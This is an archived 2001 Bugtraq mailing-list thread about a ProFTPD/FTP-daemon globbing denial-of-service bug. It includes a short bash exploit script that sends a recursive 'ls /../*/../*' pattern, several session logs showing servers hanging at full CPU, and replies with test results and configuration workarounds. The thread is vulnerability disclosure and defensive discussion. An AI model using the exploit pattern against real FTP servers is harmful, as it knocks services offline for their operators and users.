6941350 2001-08-20 15:20 +0200  /55 rader/ Enrico Kern <IphantomI@web.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-20  19:52  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18853>
Ärende: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Message-ID: <200108201320.f7KDKZK26818@mailgate4.cinetic.de>

Hi,

i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
many new Linux-Dist.. When a user logged in in ftp and type
the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
the command 2 or 3x than the full system hang up. it also works in =
console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
in march 01, but
it still works so i post it again.

affected:

RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?


Not vuln.:

latest Wu-Ftpd
Windows FTP-Server


Exploit:

#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20

Fix:

set cpu-limit for your anonymous user.


-------------------------
Enrico Kern
www.h07.org
_______________________________________________________________________
1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de
IhrName@web.de, 8MB Speicher, Verschluesselung - http://freemail.web.de
(6941350) /Enrico Kern <IphantomI@web.de>/----------
Kommentar i text 6942692 av skip <skip@fif3.com>
Kommentar i text 6943064 av Scott Dier <dieman@ringworld.org>
Kommentar i text 6943159 av Mike Jakubik <mikej@trigger.net>
Kommentar i text 6943274 av Bernhard Rosenkraenzer <bero@redhat.de>
Kommentar i text 6943282 av Roman Drahtmueller <draht@suse.de>
6942692 2001-08-20 13:35 -0700  /18 rader/ skip <skip@fif3.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-20  23:22  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18859>
Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
I just tested on Slackware 8 running ProFTPD Version 1.2.1
and no bug... or at least I received the directory listings and no
great CPU load was seen nor did my system hang. Tested via
localhost and a remote host.
----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6942692) /skip <skip@fif3.com>/--------------------
Bilaga (application/x-pkcs7-signature) i text 6942693
Kommentar i text 6943150 av jeev <geonap@pacbell.net>
6942693 2001-08-20 13:35 -0700  /13 rader/ skip <skip@fif3.com>
Bilagans filnamn: "smime.p7s"
Importerad: 2001-08-20  23:22  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18860>
Bilaga (text/plain) till text 6942692
Ärende: Bilaga (smime.p7s) till: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
0€
*†H†÷
 €0€10
+0€
*†H†÷
 ‚
u0‚0‚| V0

*†H†÷
0’10
UZA10UWestern Cape10U	Cape
Town10
U
Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.300
010730171958Z
020730171958Z0‹10UThawte Freemail Member10	*†H†÷
	
skip@fif3.com1'0%	*†H†÷
	sstellhorn@onesecure.com1!0	*†H†÷
	skip@lovesheep.com0Ÿ0
	*†H†÷
0‰Ÿ³;’Õör‰‡{éz¹ŒÜçȦåeßï›~Ζ¥¼bpًé
÷z̙Ø(g8ƒø˲w؟owRœîÛ·‹i6'»[jFÀw•ÿEs÷·‘&yûE»oœ8tç‘ÆÓ´'d•/‚_BûŒOiö¬<Ôûyù£|0z0Uÿù€0	`†H†øB 0FU?0=
skip@fif3.comsstellhorn@onesecure.comskip@lovesheep.com0Uÿ00
	*†H†÷
§:Ÿ7ÉóálÔùe¿‘
†}-‡a„ØWK ¢«Œ¹&©¥»ú.‹£ûÝ×c†¼)O–Œ.
ÂVËá€äàhÞ{å–©ÿß_ã6pe„Éîr݋fJt®ÝzñHfY¦³[…4·äðT‹ïléiBA]ŒÆ~ËÀMg—â¤0‚)0‚’ 0
	*†H†÷
0Ñ10	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*†H†÷
	personal-freemail@thawte.com0
000830000000Z
020829235959Z0’10	UZA10UWestern Cape10U	Cape Town10
U
Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.300Ÿ0
	*†H†÷
0‰Þ32¦cÇ	%E>Ònx'gÅڈ‚—ãD)Šc5*mp<úÜ®÷îto0¼3ù4q £m˜ñÃO¢eÛ
úKñÖÝa¥ù…ÍUš5’u¨'®Ørùºö×°‘Þé«à¨|CBPQ‡ƒ<ð9´›TŠ‡ÿ³›If-	‰ì”ké¡i£N0L0)U"0 ¤010UPrivateLabel1-2970Uÿ0ÿ0U0
	*†H†÷
so&e‹ÿ4KYbŠíD¾IÇè
»¹
j&*b„¸‡ctm·ÏS‘KáÍæ8ÙíPô:l4’¬æ’œnÁ#Â	§ïK®rÝgõPo.X¸¶ÁPWµì×ï¶Õˆ›·¢ˆí9[9}4ü¶–%MjôÅÑ/©–¸<RüÝébH0‚-0‚– 0
	*†H†÷
0Ñ10	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*†H†÷
	personal-freemail@thawte.com0
960101000000Z
201231235959Z0Ñ10	UZA10UWestern Cape10U	Cape Town10U
Thawte Consulting1(0&UCertification Services Division1$0"UThawte Personal Freemail CA1+0)	*†H†÷
	personal-freemail@thawte.com0Ÿ0
	*†H†÷
0‰Ôi×Ô°”d[qéGØQ¶êr‘°„^}-
{߅%u(t:B,c'Ÿ•{Kï~‡†ê£Ý¹Î–dÂnD¬|æèMq@8¦£‡xöù”†^­êÀ^vëÙ£]nz|¥KU)žš&Õj»8$j˜Ç±Ú£˜‘ýyÛåZĹ£00Uÿ0ÿ0
	*†H†÷
Çì’~Nøõ–¥gb*¤ðM`Ðo`Xa¬&»R5\Ï0û¨J–ŠbB#Œôºdœ¬G)ߝ˜^Òl`q\¢¬ÜyãçnGµ
(èäšýô¦Ù|±øÜ_#&	‘€sÐÞC©ƒ%òæœ/Êþ¦«Šu‹ÝQ„käøÑÎw¢1‚þ0‚ú0š0’10	UZA10UWestern Cape10U	Cape Town10
U
Thawte10UCertificate Services1(0&UPersonal Freemail RSA 2000.8.30V0	+ º0	*†H†÷
	1	*†H†÷
0	*†H†÷
	1
010820203554Z0#	*†H†÷
	1¬ýžYû¥oâD…W,â2×Æx0[	*†H†÷
	1N0L0
*†H†÷
0*†H†÷
€0
*†H†÷
@0+0
*†H†÷
(0+0
	*†H†÷
€}ñ(»-y»aŸGyùÓ
c¬j	³›ˆä³‹*Ž!Ò?CæR´Û˜ Ï*	˜+´'‡);ÁÌÀ
9b‡N¼tñô2–öwæ* tuLû#ò;Rϔ‰ðèçc‰øph
%/sÖÏ»ÝÙûÛµÀ;õë…Šðtƒ·ƒÒÃÙè
(6942693) /skip <skip@fif3.com>/----------(Ombruten)
6943150 2001-08-20 14:29 -0700  /39 rader/ jeev <geonap@pacbell.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  01:41  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18867>
Kommentar till text 6942692 av skip <skip@fif3.com>
Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: jeev <geonap@pacbell.net>
To: bugtraq@securityfocus.com
Message-ID: <000501c129bf$32cf18d0$0100a8c0@jeev>

Tested on slack 8 with 1.2.2rc3 no problem, and with 1.2.2 no problem:

ftp> ls /../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of /../*/../*/../*/../*/../*/../*/../*
226 Transfer complete.
ftp>

j

-----Original Message-----
From: skip [mailto:skip@fif3.com] 
Sent: Monday, August 20, 2001 1:36 PM
To: bugtraq@securityfocus.com
Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)

I just tested on Slackware 8 running ProFTPD Version 1.2.1
and no bug... or at least I received the directory listings and no
great CPU load was seen nor did my system hang. Tested via
localhost and a remote host.
----
- skip
----
- p.s. we sincerely apologize to all platypus enthusiasts out
- there who are offended by that thoughtless comment about
- the platypi. we love the noble platypus, and it is not our
- intention to slight these stupid creatures in any way.
----
(6943150) /jeev <geonap@pacbell.net>/---------------
6943064 2001-08-20 15:35 -0500  /21 rader/ Scott Dier <dieman@ringworld.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  01:10  av Brevbäraren
Extern mottagare: Enrico Kern <IphantomI@web.de>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18866>
Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Scott Dier <dieman@ringworld.org>
To: Enrico Kern <IphantomI@web.de>
Cc: bugtraq@securityfocus.com
Message-ID: <20010820153506.M9092@ringworld.org>

* Enrico Kern <IphantomI@web.de> [010820 12:31]:
> Hi,
> 
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =

http://www.proftpd.org/critbugs.html

Add "DenyFilter \*.*/" to your config.

No software patch beats actual systems administration.

-- 
Scott Dier <dieman@ringworld.org> <sdier@debian.org>
http://www.ringworld.org/  #linuxos@irc.openprojects.net
(6943064) /Scott Dier <dieman@ringworld.org>/-------
6943159 2001-08-20 15:14 -0400  /28 rader/ Mike Jakubik <mikej@trigger.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  01:47  av Brevbäraren
Extern mottagare: Enrico Kern <IphantomI@web.de>
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18868>
Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de>
Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Mike Jakubik" <mikej@trigger.net>
To: "Enrico Kern" <IphantomI@web.de>, <bugtraq@securityfocus.com>
Message-ID: <FMELKCEINAGGPLLNMKEOGEACCNAA.mikej@trigger.net>

> Hi,
>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
> the command 2 or 3x than the full system hang up. it also works in =
> console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
> in march 01, but
> it still works so i post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?

FreeBSD 4.3 is NOT affected by this, your system code may be out of
sync.  Yes, this is an old globing bug, almost all ftp daemons have
been updated by now. Distributions before the bugs announced day will
of course be affected.
(6943159) /Mike Jakubik <mikej@trigger.net>/(Ombruten)
6943274 2001-08-20 19:36 +0200  /21 rader/ Bernhard Rosenkraenzer <bero@redhat.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  02:44  av Brevbäraren
Extern mottagare: Enrico Kern <IphantomI@web.de>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18871>
Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Bernhard Rosenkraenzer <bero@redhat.de>
To: Enrico Kern <IphantomI@web.de>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0108201935480.32746-100000@bochum.stuttgart.redhat.com>

On Mon, 20 Aug 2001, Enrico Kern wrote:

> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> many new Linux-Dist..
>
> affected:
>
> RedHat Linux 7.x

We don't ship proftpd (and never did).

LLaP
bero
(6943274) /Bernhard Rosenkraenzer <bero@redhat.de>/-
6943282 2001-08-21 01:40 +0200  /55 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  02:50  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: security@suse.de
Mottagare: Bugtraq (import) <18872>
Kommentar till text 6941350 av Enrico Kern <IphantomI@web.de>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: <bugtraq@securityfocus.com>
Cc: <security@suse.de>
Message-ID: <Pine.LNX.4.33.0108210132220.9532-100000@dent.suse.de>

>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
> the command 2 or 3x than the full system hang up. it also works in =
> console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ  =
> in march 01, but
> it still works so i post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2

I wonder when or where you tested this. The proftpd package that can be
found in the /pub/suse/<arch>/update/*/n1/ directories on ftp.suse.com
(age: May 9th) do not show this behaviour and appears to be sane.

[...]

> Fix:
>
> set cpu-limit for your anonymous user.

I doubt that this solution is very efficient if you provide automatic
gzip (and maybe tar) service so that your users can get a directory
recursively in form of a tarfile by using the command

 get directory_name.tar.gz

You'd have to choose...

Also recommended:

DenyFilter  "%"

if there are more format string errors in the code, this might be an
easy workaround until the code is fixed in the right place.

Roman.
-- 
 -                                                                      -
| Roman Drahtmüller      <draht@suse.de> //          "Caution: Cape does |
  SuSE GmbH - Security           Phone: //       not enable user to fly."
| Nürnberg, Germany     +49-911-740530 // (Batman Costume warning label) |
 -                                                                      -
(6943282) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
6942124 2001-08-20 19:20 +0000  /19 rader/ Michael Faurot <mfaurot@atww.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-20  22:03  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18858>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lrnt0$k0p$1@phzzzt.atww.org>

Enrico Kern <IphantomI@web.de> wrote:
: Hi,

: i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
: many new Linux-Dist.. 

This bug appears to still be present with Debian Stable (Potato) which
uses ProFTPd v1.2.0pre10.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | Give your child mental blocks for Christmas.
 Faurot  | atww.org |
(6942124) /Michael Faurot <mfaurot@atww.org>/-------
Kommentar i text 6943051 av Robert van der Meulen <rvdm@debian.org>
6943051 2001-08-21 00:12 +0200  /25 rader/ Robert van der Meulen <rvdm@debian.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  01:06  av Brevbäraren
Extern mottagare: Michael Faurot <mfaurot@atww.org>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18864>
Kommentar till text 6942124 av Michael Faurot <mfaurot@atww.org>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Robert van der Meulen <rvdm@debian.org>
To: Michael Faurot <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <20010821001246.A9136@wiretrip.org>

Hi,

Quoting Michael Faurot (mfaurot@atww.org):
> : i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> : many new Linux-Dist.. 
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
Are you sure ? what exact version are you testing with ? 
I tested this with a couple of Debian stable machines, all running with the
latest security updates (i.e. proftpd 1.2.0pre10-2.0potato1), and couldn't
reproduce it.

Greets,
	Robert
-- 
			      Linux Generation
   encrypted mail preferred. finger rvdm@debian.org for my GnuPG/PGP key.
	<doogie> 'How to Raise Your I.Q. by Eating Gifted Children'
(6943051) /Robert van der Meulen <rvdm@debian.org>/-
6943262 2001-08-21 01:41 +0200  /55 rader/ E. van Elk <evelk@dsv.nl>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  02:38  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18870>
Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "E. van Elk" <evelk@dsv.nl>
To: bugtraq@securityfocus.com
Message-ID: <5.1.0.14.2.20010821012930.02edfd50@pop.eve-software.com>

At 00:43 21-8-2001, you wrote:
 >Couldn't reproduce on Debian 2.2....
 >
 >isp-server-03:/# proftpd -v
 > - ProFTPD Version 1.2.0pre10

I tested it on my Debian 2.2 machine and:

:/# proftpd -v
  - ProFTPD Version 1.2.0pre10

Verbonden met .
220 ProFTPD 1.2.0pre10 Server (Debian) []
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 No files found.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the 
server is broken..

Debian 2.2 ftpd 0.11-8potato.1 is vulnerable too:

Verbonden met .
220  FTP server (Version 6.2/OpenBSD/Linux-0.10) ready.
Gebruiker ( :(none)):
331 Password required for .
Wachtwoord:
230- Linux 2.2.19pre17 #1 Tue Mar 13 22:37:59 EST 2001 i686
unknown
230-
230 User  logged in.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 not found
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
Verbinding verbroken door externe host.
ftp>

CPU goes to 99.1 % and after the second attempt the connection to the 
server is broken..
(6943262) /E. van Elk <evelk@dsv.nl>/---------------
6943327 2001-08-21 08:43 +1000  /50 rader/ Michael Bellears <michael.bellears@staff.datafx.com.au>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  03:19  av Brevbäraren
Extern mottagare: 'Michael Faurot' <mfaurot@atww.org>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18875>
Ärende: RE: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: Michael Bellears <michael.bellears@staff.datafx.com.au>
To: 'Michael Faurot' <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>

Couldn't reproduce on Debian 2.2....

isp-server-03:/# proftpd -v
 - ProFTPD Version 1.2.0pre10

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
Forbidden command argument
ftp> quit
221 Goodbye.

Regards,
MB


> -----Original Message-----
> From: Michael Faurot [mailto:mfaurot@atww.org]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraq@securityfocus.com
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
> 
> 
> Enrico Kern <IphantomI@web.de> wrote:
> : Hi,
> 
> : i tested an old proftpd bug (ls 
> /../*/../*/../*/../*/../*/../*/../*) on =
> : many new Linux-Dist.. 
> 
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
> 
> -- 
> --------------------------------------------------------------
> ----------------
>  Michael | mfaurot  | Give your child mental blocks for Christmas.
>  Faurot  | atww.org | 
>
(6943327) /Michael Bellears <michael.bellears@staff.datafx.com.au>/
6943621 2001-08-21 03:54 +0000  /76 rader/ Michael Faurot <mfaurot@atww.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-21  06:26  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18879>
Ärende: Re: Multiple-Vendor-FTP-Vuln. (old?)
------------------------------------------------------------
From: "Michael Faurot" <mfaurot@atww.org>
To: bugtraq@securityfocus.com
Message-ID: <9lsm23$2g9$1@phzzzt.atww.org>

Michael Bellears <michael.bellears@staff.datafx.com.au> wrote:
: Couldn't reproduce on Debian 2.2....

: isp-server-03:/# proftpd -v
:  - ProFTPD Version 1.2.0pre10

Debian 2.2 and the same version of ProftpD here.

According to dpkg:

dpkg -s proftpd | grep ^Version
Version: 1.2.0pre10-2.0potato1


The client side of the ftp session, that initiates the problem:
------------------------------------------------------------------------------

Script started on Mon Aug 20 18:15:49 2001
$ ftp ftp.mydomain.com
Connected to web.mydomain.com.
220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com]
Name (ftp.mydomain.com:mfaurot):
331 Password required for mfaurot.
Password:
230 User mfaurot logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
Quit
$ exit
Script done on Mon Aug 20 18:18:22 2001
------------------------------------------------------------------------------

After issuing the "ls" command the server seems to freeze after
displaying "150 Opening ASCII mode data connection for file list."  It
then becomes necessary to issue a Ctrl-\ to exit the ftp client.

Now, on the server hosting Proftpd, here's the relevant bit from "top"
showing the proftpd process sucking all the available CPU and a lot of
the RAM:
------------------------------------------------------------------------------

  6:18pm  up 5 days,  3:02,  2 users,  load average: 0.28, 0.06, 0.02           45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped
CPU states:  0.6% user,  0.1% system,  0.2% nice,  1.9% idle
Mem:  255984K av, 184876K used,  71108K free,      0K shrd,   2464K buff
Swap: 248968K av,  26260K used, 222708K free                 19400K cached
 
  PID USER     PRI  NI  SIZE  RSS SHARE STAT  LIB %CPU %MEM   TIME COMMAND
27556 mfaurot   20   0 76884  75M   952 R       0 96.4 30.0   0:21 proftpd
27561 mfaurot   12   0  1476 1476   740 R       0  2.8  0.5   0:00 top
    1 root       8   0   132   84    60 S       0  0.0  0.0   0:03 init
    2 root       9   0     0    0     0 SW      0  0.0  0.0   0:00 keventd

------------------------------------------------------------------------------

NOTE:  The configuration option "DenyFilter \*.*/" has not been applied
to this system.  While that might well resolve the issue for me, 
that's not going to fix the problem for the next person that is
unaware of the bug.  

In discussing this situation with Robert van der Meulen, I note that
this only happens when one logs in with a regular user id and
password, but it doesn't happen when doing an anonymous login.

-- 
------------------------------------------------------------------------------
 Michael | mfaurot  | We're all just basically monkeys with car keys.
 Faurot  | atww.org |
(6943621) /Michael Faurot <mfaurot@atww.org>/-------